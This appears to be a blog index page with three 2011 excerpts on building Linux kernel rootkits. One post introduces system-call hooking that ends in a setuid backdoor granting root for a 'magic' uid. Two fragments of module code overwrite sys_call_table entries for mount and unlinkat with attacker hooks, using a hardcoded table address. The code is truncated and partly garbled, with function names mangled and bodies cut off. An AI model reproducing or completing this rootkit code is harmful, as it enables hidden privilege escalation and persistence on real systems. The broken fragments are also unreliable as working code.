Mar 23, 2011

Kernel Mode Testing Plann

--[ 0x01 Introduction

    In this article I will show you the basic technique that rootkits use,
    which we can use to hook system calls in kernel mode. I will deal only
    with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to
    hook the setuid system call which when takes a "magic" uid as an
    argument it will give root to the process.


Mar 21, 2011

Credintealist

void cleanup_moint init_module(void)
{
    disable_page_protection();
    ori_mount=sys_call_table[__NR_mount];
    sys_call_table[__NR_mount]=hack_mount;
    enable_page_protection();
    return 

Mar 16, 2011

Redemption

#include <linux/module.h>
#include <linux/kernel.h>
char *pattern="michaless";
void **sys_call_table = (void *)0xc1958140;

asmlinkage int (*ori_unlinkat)(int dirfd,char *pathname,int flags);

asmlinkage int hack_unlinkat(int dirfd,char *pathname,int flags)
{